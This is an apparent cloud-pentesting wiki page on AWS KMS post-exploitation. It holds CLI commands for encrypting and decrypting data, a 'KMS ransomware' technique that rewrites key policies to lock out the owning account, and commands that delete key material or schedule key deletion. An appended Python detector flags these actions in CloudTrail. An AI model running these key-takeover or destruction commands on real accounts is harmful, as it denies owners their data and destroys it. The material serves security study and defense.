AWS - KMS Post Exploitation

KMS

For more information check:

Encrypt/Decrypt information

Note that if you want to decrypt some data inside a file, the file must contain the binary data, not base64-encoded data.

  • Using a symmetric key:

# Encrypt data
aws kms encrypt \
--key-id f0d3d719-b054-49ec-b515-4095b4777049 \
--plaintext fileb:///tmp/hello.txt \
--output text \
--query CiphertextBlob | base64 \
--decode > ExampleEncryptedFile

# Decrypt data
aws kms decrypt \
--ciphertext-blob fileb://ExampleEncryptedFile \
--key-id f0d3d719-b054-49ec-b515-4095b4777049 \
--output text \
--query Plaintext | base64 \
--decode
  • Using an asymmetric key:

# Encrypt data
aws kms encrypt \
--key-id d6fecf9d-7aeb-4cd4-bdd3-9044f3f6035a \
--encryption-algorithm RSAES_OAEP_SHA_256 \
--plaintext fileb:///tmp/hello.txt \
--output text \
--query CiphertextBlob | base64 \
--decode > ExampleEncryptedFile

# Decrypt data
aws kms decrypt \
--ciphertext-blob fileb://ExampleEncryptedFile \
--encryption-algorithm RSAES_OAEP_SHA_256 \
--key-id d6fecf9d-7aeb-4cd4-bdd3-9044f3f6035a \
--output text \
--query Plaintext | base64 \
--decode

KMS Ransomware

An attacker with privileged access over KMS can modify the KMS key policy of the keys and grant their own account access over them, removing the access granted to the legitimate account.

Therefore, the users of the legitimate account won't be able to access any information of any service that was encrypted with those keys, creating a simple but effective ransomware over the account.

Note that AWS managed keys aren't affected by this attack; only Customer managed keys are.

Also note the need to use the param --bypass-policy-lockout-safety-check (the lack of this option in the web console makes this attack only possible from the CLI).

# Force policy change
aws kms put-key-policy --key-id mrk-c10357313a644d69b4b28b88523ef20c \
--policy-name default \
--policy file:///tmp/policy.yaml \
--bypass-policy-lockout-safety-check

{
  "Id": "key-consolepolicy-3",
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "Enable IAM User Permissions",
      "Effect": "Allow",
      "Principal": {
        "AWS": "arn:aws:iam::<your_own_account>:root"
      },
      "Action": "kms:*",
      "Resource": "*"
    }
  ]
}

Note that if you change that policy and only grant access to an external account, and then from that external account you try to set a new policy to give access back to the original account, you won't be able to.

Generic KMS Ransomware

Global KMS Ransomware

There is another way to perform a global KMS Ransomware, which would involve the following steps:

  • Create a new key with key material imported by the attacker

  • Re-encrypt the old data that was encrypted with the previous version using the new one.

  • Delete the KMS key

  • Now only the attacker, who has the original key material, can decrypt the encrypted data.

Destroy keys

# Destroy the key material previously imported, making the key useless
aws kms delete-imported-key-material --key-id 1234abcd-12ab-34cd-56ef-1234567890ab

# Schedule the deletion of a key (min wait time is 7 days)
aws kms schedule-key-deletion \
--key-id arn:aws:kms:us-west-2:123456789012:key/1234abcd-12ab-34cd-56ef-1234567890ab \
--pending-window-in-days 7
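As an added defensive example (not code from the original page), the following Python flags in CloudTrail the actions described in both the KMS Ransomware and Destroy keys sections: a PutKeyPolicy call with the policy lockout safety check bypassed, a key policy that grants access to a principal from another account, and ScheduleKeyDeletion / DeleteImportedKeyMaterial. The events are constructed samples, and the field names assume CloudTrail's usual shape for KMS events.

```python
import json
import re

# Constructed sample CloudTrail events (not real captures), trimmed to the fields the checks use.
# Assumption: PutKeyPolicy's requestParameters carries keyId, policyName, bypassPolicyLockoutSafetyCheck and the policy as a JSON string.
EXTERNAL_POLICY = json.dumps({"Version": "2012-10-17", "Statement": [{
    "Sid": "Enable IAM User Permissions", "Effect": "Allow",
    "Principal": {"AWS": "arn:aws:iam::222222222222:root"},
    "Action": "kms:*", "Resource": "*"}]})
SAMPLE_EVENTS = [
    {"eventSource": "kms.amazonaws.com", "eventName": "PutKeyPolicy", "recipientAccountId": "111111111111",
     "requestParameters": {"keyId": "mrk-c10357313a644d69b4b28b88523ef20c", "policyName": "default",
                           "bypassPolicyLockoutSafetyCheck": True, "policy": EXTERNAL_POLICY}},
    {"eventSource": "kms.amazonaws.com", "eventName": "DeleteImportedKeyMaterial", "recipientAccountId": "111111111111",
     "requestParameters": {"keyId": "1234abcd-12ab-34cd-56ef-1234567890ab"}},
    {"eventSource": "kms.amazonaws.com", "eventName": "ScheduleKeyDeletion", "recipientAccountId": "111111111111",
     "requestParameters": {"keyId": "1234abcd-12ab-34cd-56ef-1234567890ab", "pendingWindowInDays": 7}},
    {"eventSource": "kms.amazonaws.com", "eventName": "Decrypt", "recipientAccountId": "111111111111",
     "requestParameters": {"keyId": "f0d3d719-b054-49ec-b515-4095b4777049"}},
]
ARN_ACCOUNT = re.compile(r"^arn:aws:iam::(\d{12}):")

def foreign_principals(policy_json, own_account):
    """Principals in Allow statements that are wildcards or belong to an account other than own_account."""
    found = []
    for stmt in json.loads(policy_json).get("Statement", []):
        if stmt.get("Effect") != "Allow":
            continue
        principal = stmt.get("Principal", {})
        aws = principal if isinstance(principal, str) else principal.get("AWS", [])
        for arn in ([aws] if isinstance(aws, str) else aws):
            m = ARN_ACCOUNT.match(arn)
            if arn == "*" or (m and m.group(1) != own_account):
                found.append(arn)
    return found

def classify(event):
    """Findings for one CloudTrail KMS event (empty list when nothing matches the techniques above)."""
    name, params = event.get("eventName"), event.get("requestParameters") or {}
    key, findings = params.get("keyId", "?"), []
    if name == "PutKeyPolicy":
        if params.get("bypassPolicyLockoutSafetyCheck"):
            findings.append(f"{key}: PutKeyPolicy with the lockout safety check bypassed")
        ext = foreign_principals(params.get("policy", "{}"), event.get("recipientAccountId", ""))
        if ext:
            findings.append(f"{key}: key policy grants kms access to external principals {ext}")
    elif name in ("ScheduleKeyDeletion", "DeleteImportedKeyMaterial"):
        findings.append(f"{key}: {name} (key or key material being destroyed)")
    return findings
```

In practice the same checks run over an Athena or EventBridge feed of CloudTrail; the two PutKeyPolicy findings together are the signature of the policy takeover described above.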

Note that AWS now prevents the previous actions from being performed from a different account:
